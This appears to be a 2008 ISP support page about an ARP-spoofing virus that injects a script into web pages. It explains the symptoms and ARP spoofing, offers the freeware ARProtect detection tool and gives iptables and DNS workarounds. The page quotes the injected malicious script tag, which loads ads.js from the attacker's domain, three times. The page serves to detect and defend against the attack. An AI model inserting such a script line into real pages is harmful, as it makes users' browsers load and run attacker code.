Solution for g.asdafdgfgf.com problem

ARProtect
ARP spoof detection tool

Find ARP Spoofer in your network

5th February 2008

New version released on 22nd February 2008

20th June 2008:

Drishti announces development of "ARP2", a comprehensive ARP firewall for windows and Linux. ARP2 protects your PC / Server from arp spoofing and poisoning. ARP2 also implements stateful inspection of arp traffic, putting and end to various ARP related network subversive activities.

It can also accurately identify the culprit host in the network accurately (possibly little better than ARProtect)

This would be a must-have firewall for every computer which is connected on ethernet.

ARP2 is scheduled to reach Beta on 18th July 2008.

If you can spare few hours and are administrator of a network, please drop us a line for participation in beta testing. You can reach us at achandra a_t netoptima.in

We can provide binaries for ARProtect on i386 Linux platform.

Embedded networking devices are now the bottleneck in an ethernet environment. We can provide customized ARP Firewall solution for embedded linux platforms for protection against ARP spoofing virus.

Anil Chandra K

achandra a_t netoptima.in

 

We have broadband services (Drishti Broadband) operating in Secunderbad (India). Because of the close proximity of our customers, we use switches & Ethernet to connect. So we have a very big physical network.

Recently we observed rampant ARP spoofing in our network. Readers may know about injecting ads.js from asdafdgfgf.com and 222360.com.

Fortunately it could be removed by installing AVG free edition or using removal tool from http://www.grisoft.com/doc/virbase/us/crp/0?nam=Win32%2FVirut

Due to the size of our physical network, the virus keeps coming back. Then this problem was referred to our R&D team.

FAQ:

1) My browser shows inserted javascript line <SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>. Is my computer infected with virus?

Ans: Not necessarily. It is more likely to be due to an infected computer in your network.

2) Is my ISP inserting the javascript line?

Ans: Definitely NO. This problem is caused by computers infected in your physical network. Your ISP does not insert js into your pages. It is illegal to modify data in any way by the ISP, except for blocking certain data which is likely to cause problems.

3) How can you tell my network is having asdafdgfgf problem?

Ans: Symptoms of asdafdgfgf problem for Client computer

a) HTML pages have javascript line inserted at the top of the page

b) Some websites do not open. e.g. suddenly gmail , yahoo or youtube stops working.

c) Your downloads are stopped in the middle and you get connection reset error.

Symptoms of asdafdgfgf problem in your server (gatewa)

1) Almost all computers in the network show same MAC ID.

2) Bandwidth graph is erratic

3) Too many RST packets

4) More importantly, complaints from users.

4) Why are you releasing this software as freeware?

Ans: Drishti Broadband has lost almost half of its customers due to this problem. We didn't want others to face the same.

5) Can I install some software on the server and solve the problem?

Ans: No. Unfortunately there is no authentication mechanism in ARP. You need to trust client computer's ARP packets and that is where the problem stems.

<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>

This line is inserted into the web page. Do not block traffic to this domain. Just redirect traffic to your local web server (using iptables) and have ads.js blank page on the webserver. We have apache installed on the gateway. If you have problem doing this, resolve g.asdafdgfgf.com and assign the IP address to your gateway (both windows and linux)

 

6) How can some other computer in the network insert javascript line in my web page?

Ans: This happens by arp spoofing and redirecting of traffic.

http://www.watchguard.com/infocenter/editorial/135324.asp
http://en.wikipedia.org/wiki/ARP_spoofing

Infected computer pretends as your PC to the gateway and gateway to your computer. Thus all traffic reaching your PC from gateway has to pass through the infected computer.

Infected computer does not stall all traffic. It passes on most of the traffic to your PC but inserts javascript line into your html page.

When the infected computer has too much of work load, it simply resets most of the connections causing havoc in the network.

Solution to this problem involves

a) identifying the infected computer in the network

b) Cleaning the infected PC or removing the infected PC from network.

If your network is small, simply clean all PCs in the network. There is no guarantee that the virus will not come back.

Or simply install ARProtect software (freeware) that will identify infected PCs in your network and clean the infected PC.

(fig) ARP spoofing in progress
ARP Spoof Attack
(fig) ARP spoofing in progress

We have developed a simple windows application that will pinpoint the IP address of the computer having such virus. And we decided to release the tool as freeware.

Download ARProtect from

As promised, releasing new version. This refreshes faster.

NOTE: LOOK FOR IP ADDRESS WHERE CORRESPONDING COUNT INCREASES REGULARLY. THIS IS THE SPOOF FRAME COUNT.

Please be patient for results. Keep the software running to detect spoofing PCs in your network.

Read the entire document completely before installing the software.

http://www.netoptima.in/ARProtect_Setup_0.12.27.exe (Latest Version)

http://www.netoptima.in/ARProtect_Setup_0.12.15.exe (Old Version)

(Check this page again, we are releasing an update to ARProtect in couple of days - 7th Feb 2008 - done.)

Note for Vista users: After installation, right click on desktop icon for ARProtect and select "run as administrator" for the first time.

You may want to protect your network from pornography using NetOptima, Network statistical pornography filter. You can download eval version of NetOptima here.

We have two more requests for ARPScan and ARPing. We will be releasing the same in near future.

How to use ARProtect?

Download and install ARProtect.

You need to restart the computer after the installation. Restarting ensures proper installation of drivers.

Run the program

You will get a screen like this.

screen shot 1

Wait for the list box to get populated.

If virus is found, list of IP address are displayed in the list box as follows.
screen shot 2

How to interpret results?

  1. If the IP address list contains your gateway, it may not be having virus. The logic simply catches gateway IP in addition to Spoofing IPs.
  2. The IP address is definitely spoofing if the count associated with IP address is growing.
  3. It may show computer on which this software runs. It is not guaranteed to be a spoofing IP.

If you are unable to identify the spoofing IP using this software, odds are that your computer is spoofing. :)

What Next?

Remove cable to the IP address identified as spoofing IP and re-run the test just to be doubly sure.

Remove any virus on the computer using AVG or http://www.grisoft.com/doc/virbase/us/crp/0?nam=Win32%2FVirut

Tricks

<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>

This line is inserted into the web page.Do not block traffic to this domain. Just redirect traffic to your local web server (using iptables) and have ads.js blank page on the webserver. We have apache installed on the gateway. If you have problem doing this, resolve g.asdafdgfgf.com and assign the IP address to your gateway (both windows and linux)

You may want to protect your network from pornography using NetOptima, Network statistical pornography filter. You can download eval version of NetOptima here.

If you like it, drop us a line achandra a_t netoptima.in

Anil Chandra K
Madhu Kumar Raparthi